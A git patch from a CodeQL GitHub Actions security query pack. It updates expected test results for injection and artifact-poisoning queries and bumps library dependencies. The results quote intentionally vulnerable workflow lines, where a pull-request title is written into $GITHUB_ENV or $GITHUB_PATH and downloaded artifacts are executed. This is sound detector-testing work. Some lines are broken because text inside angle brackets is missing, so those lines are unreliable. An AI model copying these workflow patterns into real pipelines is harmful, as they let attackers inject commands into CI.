@@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | 
github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index ffaaf91e550..0dbff955318 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 28fffe0e5e4..5641ea53afd 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,16 +1,16 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:60:19:60:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc11..fdb5beb09aa 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | 
.github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66c..a18aa5bdc80 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected 
@@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| 
.github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| 
.github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From ba4dd2b0edfb0493d3e282e4195aba735e4d20a3 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 0321/1267] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/src/codeql-pack.lock.yml | 12 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 26 files changed, 316 insertions(+), 292 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml 
@@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf45..feafe4f68bb 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa8..8203a54dfeb 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } 
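Review bot: The new `import codeql.Locations` in DataFlow.qll is a public, file-level import placed outside `module DataFlow`, so every file that imports this library also gets the Locations names in its scope. DataFlowImplSpecific.qll and TaintTrackingImplSpecific.qll in this same commit bring the module in with `private import codeql.Locations`. Unless the re-export is intended, `private import codeql.Locations` here would keep the library's public surface as it was. The same applies to the identical line added in the TaintTracking.qll hunk.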
